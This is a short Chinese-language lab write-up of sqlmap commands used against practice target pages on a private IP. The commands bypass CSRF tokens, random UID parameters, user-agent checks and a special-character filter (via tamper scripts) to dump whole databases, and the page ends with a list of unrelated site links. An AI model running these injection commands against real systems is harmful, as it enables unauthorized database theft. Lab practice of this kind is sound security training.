SQLMap绕过 Web 应用程序保护靶机(打靶记录)

jun~2025-09-26 15:24

CSRF Protection (Case #8)

sqlmap -u "http://10.22.63.5/case8.php" \

--data="t0ken=cbb99235479c0d1610c441fdf72ebd4dd3f8f8e2e95c66aeebf2018b3e087dae&id=3" \

--csrf-token="t0ken" \

--cookie="PHPSESSID=96b46ff38285ae9f3e70f7d369feeffb" \

--level=3 \

--risk=2 \

--batch --dump-all

Random UID Protection (Case #9)

sqlmap -u "http://10.22.63.5/case9.php?id=1\&uid=1234567890" \

--cookie="PHPSESSID=96b46ff38285ae9f3e70f7d369feeffb" \

--batch --dump-all

User-Agent Protection (Case #10)

sqlmap -u "http://10.22.63.5/case10.php" \

--data="id=1" \

--cookie="PHPSESSID=96b46ff38285ae9f3e70f7d369feeffb" \

--random-agent \

--batch --dump-all

Special Character Filter (Case #11)

┌──(kali㉿kali)-[~]

└─$ sqlmap -u "http://10.22.63.5/case11.php?id=1" \

--cookie="PHPSESSID=96b46ff38285ae9f3e70f7d369feeffb" \

--tamper="between,space2comment" \

-D nextcyber \

--dump \

--batch

相关推荐
二哈赛车手5 小时前
新人笔记---ApiFox的一些常见使用出错
java·笔记·spring
wj3055853786 小时前
课程 9:模型测试记录与 Prompt 策略
linux·人工智能·python·comfyui
吃好睡好便好6 小时前
在Matlab中绘制横直方图
开发语言·学习·算法·matlab
abigriver6 小时前
打造 Linux 离线大模型级语音输入法:Whisper.cpp + 3090 显卡加速与 Rime 中英混输终极调优指南
linux·运维·whisper
wangqiaowq7 小时前
windows下nginx的安装
linux·服务器·前端
nashane7 小时前
HarmonyOS 6学习:CapsLock键失效诊断与长截图完整实现指南
学习·华为·harmonyos
YYRAN_ZZU7 小时前
Petalinux新建自动脚本启动
linux
charlie1145141917 小时前
嵌入式Linux驱动开发pinctrl篇(1)——从寄存器到子系统:驱动演进之路
linux·运维·驱动开发
Likeadust8 小时前
私有化视频会议系统/智能会议管理系统EasyDSS集群通话助力各行业安全高效远程协作
安全
于小猿Sup8 小时前
VMware在Ubuntu22.04驱动Livox Mid360s
linux·c++·嵌入式硬件·自动驾驶
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03CC-Switch & Claude 基于 Linux 服务器安装使用指南04【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法05几个好用的ip纯净度检测网站06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07装上就回不去了:CodeGraph 让 AI 编程效率飙升 92%,它到底做了什么?08用了半年 OpenRouter,我换到了 Ofox.ai — 两个 AI API 聚合平台的真实对比09codex app每次打开重连5次Reconnecting问题解决10【AI】2026 年具身智能模型和世界模型总结